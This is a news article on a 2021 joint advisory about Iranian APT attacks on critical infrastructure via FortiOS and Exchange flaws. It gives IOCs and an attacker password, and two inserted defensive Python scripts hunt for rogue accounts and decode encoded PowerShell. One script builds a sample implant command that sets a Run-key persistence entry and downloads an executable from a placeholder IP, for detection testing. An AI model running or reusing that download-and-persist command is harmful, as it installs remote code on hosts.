
Iranian Hackers Are Going After US Critical Infrastructure

Organizations responsible for critical infrastructure in the US are in the crosshairs of Iranian government hackers, who are exploiting known vulnerabilities in enterprise products from Microsoft and Fortinet, government officials from the US, UK, and Australia warned on Wednesday.

A joint advisory published Wednesday said an advanced-persistent-threat hacking group aligned with the Iranian government is exploiting vulnerabilities in Microsoft Exchange and Fortinet’s FortiOS, the operating system that underpins the company’s FortiGate security appliances. All of the identified vulnerabilities have been patched, but not everyone who uses the products has installed the updates. The advisory was released by the FBI, the US Cybersecurity and Infrastructure Security Agency (CISA), the UK’s National Cyber Security Centre (NCSC), and the Australian Cyber Security Centre (ACSC).

A Broad Range of Targets

“The Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple US critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations,” the advisory stated. “FBI, CISA, ACSC, and NCSC assess the actors [that] are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.”

The advisory said the FBI and CISA have observed the group exploit Fortinet vulnerabilities since at least March and Microsoft Exchange vulnerabilities since at least October to gain initial access to systems. The hackers then initiate follow-on operations that include deploying ransomware.

In May, the attackers targeted an unnamed US municipality, where they likely created an account with the username “elie” to further burrow into the compromised network. A month later, they hacked a US-based hospital specializing in health care for children. The latter attack likely involved Iranian-linked servers at 91.214.124[.]143, 162.55.137[.]20, and 154.16.192[.]70.

Last month, the APT actors exploited Microsoft Exchange vulnerabilities that gave them initial access to systems in advance of follow-on operations. Australian authorities said they also observed the group leveraging the Exchange flaw.

Watch Out for Unrecognized User Accounts

The hackers may have created new user accounts on the domain controllers, servers, and workstations of the networks they compromised, and in Active Directory itself. Some of the accounts appear to mimic existing accounts, so the usernames differ from one targeted organization to the next. The advisory said network security personnel should search for unrecognized accounts, paying special attention to the usernames Support, Help, elie, and WADGUtilityAccount.
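The hunt the advisory asks for has two parts: match the usernames it lists, and catch accounts that mimic legitimate ones, which no fixed list can cover. The script below is an added example, not code from the advisory or the article. It runs over a constructed export of Windows Security events (Event ID 4720, user account created, and 4732, member added to a local group, with the field names simplified), compares new accounts against an assumed baseline of known accounts, and also flags a new account that is added to Administrators within a short window of its creation.

```python
"""Hunt for the account-creation pattern described in the advisory in an
export of Windows Security events.

Added example, not code from the advisory or the article.  The sample
events are constructed and the field names are simplified from the 4720
(user account created) and 4732 (member added to local group) schemas.
"""
from datetime import datetime, timedelta

# Usernames the advisory tells defenders to look for (matched case-insensitively).
ADVISORY_USERNAMES = {"support", "help", "elie", "wadgutilityaccount"}

# Assumed baseline of legitimate accounts, taken before the incident window.
KNOWN_ACCOUNTS = {"Administrator", "jsmith", "svc_backup"}

# Constructed sample events; not real log data.
SAMPLE_EVENTS = [
    {"time": "2021-05-03T02:11:09", "event_id": 4720, "subject": "admin.jdoe", "target": "elie"},
    {"time": "2021-05-03T02:13:40", "event_id": 4732, "member": "elie", "group": "Administrators"},
    {"time": "2021-05-04T09:00:00", "event_id": 4720, "subject": "admin.jdoe", "target": "ckim"},
    {"time": "2021-05-05T23:47:12", "event_id": 4720, "subject": "svc_backup", "target": "svc-backup"},
    {"time": "2021-05-05T23:49:02", "event_id": 4732, "member": "svc-backup", "group": "Remote Desktop Users"},
    {"time": "2021-05-05T23:58:30", "event_id": 4732, "member": "svc-backup", "group": "Administrators"},
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance; used to catch names that mimic an existing account."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def hunt_accounts(events, known_accounts, window=timedelta(minutes=15)):
    """Return (username, reason) findings for suspicious account activity."""
    known = {k.lower() for k in known_accounts}
    created = {}  # lowercase username -> creation time
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["event_id"] == 4720:
            name = ev["target"].lower()
            created[name] = t
            if name in ADVISORY_USERNAMES:
                findings.append((name, "username listed in the advisory"))
            elif name not in known:
                # One edit away from a legitimate account (svc-backup vs svc_backup,
                # jsm1th vs jsmith) is the mimicry the advisory warns about.
                for k in sorted(known):
                    if levenshtein(name, k) == 1:
                        findings.append((name, f"lookalike of existing account {k}"))
                        break
        elif ev["event_id"] == 4732 and ev["group"].lower() == "administrators":
            name = ev["member"].lower()
            if name in created and t - created[name] <= window:
                findings.append((name, "added to Administrators shortly after creation"))
    return findings


if __name__ == "__main__":
    for user, reason in hunt_accounts(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{user}: {reason}")
```

On a real network the baseline would come from a pre-incident export of Active Directory and local SAM accounts, and the events from every domain controller and member host, since a local account on a single workstation never reaches the domain controllers' logs. Treat the lookalike check as a lead, not a verdict: a genuine new hire can collide with it, which is why the creating account (the 4720 subject) is worth keeping in the output.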

The advisory comes a day after Microsoft reported that an Iranian-aligned group it calls Phosphorus is increasingly using ransomware to generate revenue or disrupt adversaries. The group employs “aggressive brute force attacks” on targets, Microsoft added.

Early this year, Microsoft said, Phosphorus scanned millions of IP addresses in search of FortiOS systems that had yet to install the security fix for CVE-2018-13379. The flaw, a path traversal in the FortiOS SSL VPN web portal, let the hackers read clear-text credentials used to remotely access the servers. Phosphorus ended up collecting credentials from more than 900 Fortinet servers in the US, Europe, and Israel.

More recently, Phosphorus shifted to scanning for on-premises Exchange Servers vulnerable to CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, the constellation of flaws known as ProxyLogon. Microsoft fixed the vulnerabilities in March.

“When they identified vulnerable servers, Phosphorus sought to gain persistence on the target systems,” Microsoft said. “In some instances, the actors downloaded a Plink runner named MicrosoftOutLookUpdater.exe. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.”
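The chain Microsoft describes leaves three artifacts in process-creation telemetry: the renamed Plink binary, a PowerShell command line carrying a Base64 blob, and, inside that blob, a write to a Run key. The script below is an added example, not code from Microsoft or the article. It decodes `-EncodedCommand` arguments (UTF-16LE text under Base64, which is why a plain Base64 decode shows interleaved NUL bytes) and flags the filename, the encoding, Run/RunOnce persistence, and a download stage. The sample command lines are constructed; the Plink arguments and the download URL are illustrative and not indicators from the page.

```python
"""Triage process-creation command lines for the persistence chain Microsoft
described: a renamed Plink binary, a Base64-encoded PowerShell command, and
an implant that auto-starts from a Run key.

Added example, not code from Microsoft or the article.  The sample command
lines are constructed; the Plink arguments and the download URL are
illustrative, not indicators from the page.
"""
import base64
import re

# Filename Microsoft reported for the renamed Plink runner.
IOC_FILENAMES = {"microsoftoutlookupdater.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_ARG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Produce the UTF-16LE Base64 form that -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmdline: str):
    """Return (decoded_script_or_None, list of reasons the line is suspicious)."""
    reasons = []
    exe = cmdline.split()[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe in IOC_FILENAMES:
        reasons.append("filename matches the renamed Plink runner")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("Base64-encoded PowerShell")
        if RUN_KEY_RE.search(decoded):
            reasons.append("decoded script writes a Run/RunOnce key")
        if DOWNLOADER_RE.search(decoded):
            reasons.append("decoded script downloads additional content")
    return decoded, reasons


# Constructed implant script: Run-key persistence plus a loader stage.
IMPLANT_SCRIPT = (
    "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name Updater -Value 'C:\\ProgramData\\upd.exe'; "
    "(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/a', 'C:\\ProgramData\\upd.exe')"
)

# Constructed sample of process-creation command lines (e.g. from Event ID 4688).
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\Temp\\MicrosoftOutLookUpdater.exe -ssh -N user@203.0.113.5",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_powershell(IMPLANT_SCRIPT),
    "powershell.exe -NoProfile -Command Get-Service WinRM",
    "powershell.exe -enc " + encode_powershell("Get-Date"),
]


def triage_all(cmdlines):
    """Map the index of each flagged command line to its reasons."""
    out = {}
    for i, c in enumerate(cmdlines):
        _, reasons = triage_command_line(c)
        if reasons:
            out[i] = reasons
    return out


if __name__ == "__main__":
    for i, reasons in triage_all(SAMPLE_COMMAND_LINES).items():
        print(i, SAMPLE_COMMAND_LINES[i][:60], reasons)
```

An encoded command on its own is weak evidence (management tooling uses it too), which is why the script reports what the decoded content does rather than stopping at the encoding. A renamed copy of Plink will not be caught by filename once the actor changes it; on hosts with Sysmon, the original file name and hash fields in the process-creation event are the durable handle.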

Identifying High-Value Targets

The Microsoft blog post also said that, after gaining persistent access, the hackers triaged hundreds of victims to identify the most interesting targets for follow-on attacks. The hackers then created local administrator accounts with the username “help” and the password “_AS_@1394.” In some cases, the actors dumped the memory of LSASS, the Windows process that caches logon credentials, to acquire credentials for later use.

Microsoft also said that it observed the group turning BitLocker, Microsoft’s own full-disk encryption feature, which is designed to protect data at rest and keep unauthorized software from running at boot, against victims by using it to encrypt their systems.
